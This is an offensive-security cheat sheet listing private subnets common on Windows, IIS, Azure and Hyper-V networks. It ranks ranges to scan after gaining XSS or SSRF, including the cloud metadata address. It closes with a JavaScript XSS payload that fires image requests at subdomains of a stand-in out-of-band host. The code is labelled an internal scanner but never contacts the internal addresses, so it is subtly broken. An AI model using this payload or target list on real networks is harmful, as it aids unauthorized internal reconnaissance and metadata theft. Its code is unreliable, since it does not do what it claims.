TL;DR
- Windows/IIS labs often live in
192.168.x.0/24 or 10.0.0.0/8 ranges.
- Azure defaults show up as
10.0.0.0/24.
- If you have XSS or SSRF, target common internal ranges first.
Common Windows/IIS Subnets
RFC1918 private ranges
| Subnet |
Typical usage |
| 192.168.0.0/24 |
Home/small office |
| 192.168.1.0/24 |
Default gateways and APs |
| 192.168.10.0/24 |
Dev/staging LANs |
| 192.168.100.0/24 |
ISP CPE or Hyper-V defaults |
| 192.168.137.0/24 |
Windows ICS |
| 192.168.56.0/24 |
VirtualBox host-only |
Large enterprise ranges
| Subnet |
Typical usage |
| 10.0.0.0/24 |
Azure defaults |
| 10.1.0.0/16 |
Staging or QA |
| 10.10.0.0/16 |
Corporate domains |
| 10.100.0.0/16 |
AD / Exchange |
Windows-specific defaults
| Range |
Purpose |
| 192.168.137.0/24 |
ICS |
| 172.28.128.0/20 |
Windows Sandbox |
| 192.168.100.0/24 |
Hyper-V default switch |
| 169.254.0.0/16 |
APIPA (no DHCP) |
Scan Priorities (if you have XSS/SSRF)
| Priority |
Range |
Why |
| High |
192.168.0.0/24, 192.168.1.0/24 |
Default router and SMB boxes |
| High |
192.168.137.0/24 |
ICS often exposes local services |
| High |
10.0.0.0/24 |
Azure defaults |
| High |
169.254.169.254 |
Cloud metadata |
| Medium |
10.1.0.0/16, 10.10.0.0/16 |
Corporate environments |
| Medium |
172.16.0.0/24 |
VPNs and clusters |
Example XSS Scanner (internal probes)
const subnets = [
"192.168.0",
"192.168.1",
"192.168.10",
"192.168.100",
"192.168.137",
"10.0.0",
"10.10.0",
"172.16.0",
];
for (const base of subnets) {
for (let i = 1; i <= 10; i += 1) {
const ip = `${base}.${i}`;
const label = `${ip.replace(/\./g, "-")}.oob.example.com`;
const img = new Image();
img.src = `http://${label}/favicon.ico`;
}
}
Notes
- Treat internal scanning only as permitted by scope.
- Always throttle to avoid noise and accidental DoS.
